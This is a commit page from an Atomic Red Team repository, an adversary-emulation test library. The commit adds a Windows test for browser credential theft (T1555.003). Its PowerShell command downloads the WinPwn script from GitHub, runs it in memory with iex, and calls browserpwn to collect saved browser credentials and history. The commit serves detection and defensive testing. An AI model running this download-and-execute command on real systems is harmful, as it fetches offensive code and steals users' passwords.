security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added BrowserPwn test sourced from WinPwn script. (#1937)

Browse Source 
**Details**
https://github.com/S3cur3Th1sSh1t/WinPwn/

**Testing**
Tested on Windows 10 VM

Co-authored-by: Daniel White <d0w019h@homeoffice.wal-mart.com>
This commit is contained in:
dwhite9
2022-05-10 11:34:11 -05:00
committed by GitHub
parent 7a85db6711
commit c2527d32f1
1 changed files with 12 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1555.003/T1555.003.yaml
+12
View File
@@ -336,3 +336,15 @@ atomic_tests:
cleanup_command: |
Remove-Item -Path "$env:temp\T1555.003.zip" -force -erroraction silentlycontinue
Remove-Item -Path "$env:temp\T1555.003\" -force -recurse -erroraction silentlycontinue
- name: WinPwn - BrowserPwn
description: Collect Browser credentials as well as the history via winpwn browserpwn function of WinPwn.
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
browserpwn -consoleoutput -noninteractive
cleanup_command: |-
rm .\System.Data.SQLite.dll -ErrorAction Ignore
name: powershell